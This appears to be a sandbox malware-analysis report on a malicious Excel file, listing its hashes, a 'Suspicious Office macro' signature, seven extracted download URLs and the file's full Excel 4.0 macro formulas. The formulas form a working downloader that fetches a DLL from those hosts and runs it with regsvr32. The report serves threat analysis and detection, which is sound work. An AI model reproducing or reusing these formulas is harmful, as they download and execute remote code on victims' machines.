General
-
Target
5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c
-
Size
74KB
-
MD5
fbd298e0609e96411f6f50a2844c77f8
-
SHA1
e966ae890cef6b9a67e9b2ddf04716a7458d2827
-
SHA256
5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c
-
SHA512
22b7f6da1afdfe4ae3ac7cd72ef2485315d325ebc95dc65f055577a25932afb1a1a152eda155f7a2e917b8f682f95734dc5f95682000508c3526d872addb604e
-
SSDEEP
1536:uS3FXUcSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM7VI0E:N310tzSmICpH7OZuvZGsMnE
Malware Config
Extracted
http://praachichemfood.com/wp-content/lcT43/
http://support.techopesolutions.com/application/zTAIK6GZ8I6zSLk/
http://vulkanvegasbonus.jeunete.com/wp-content/vsQ3Jp0XRqEqsVu/
http://aesiafrique.com/azerty/iTbkP5mpqK/
http://abildtrup.eu/wordpress/H0uDBpR/
http://aaticd.co.za/wp-content/6JENALSdgs0RAPqV20z/
http://actua.dk/res/EaoItn4LAZOeLFrFL/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/wp-content/lcT43/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://support.techopesolutions.com/application/zTAIK6GZ8I6zSLk/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/vsQ3Jp0XRqEqsVu/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aesiafrique.com/azerty/iTbkP5mpqK/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://abildtrup.eu/wordpress/H0uDBpR/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aaticd.co.za/wp-content/6JENALSdgs0RAPqV20z/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actua.dk/res/EaoItn4LAZOeLFrFL/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c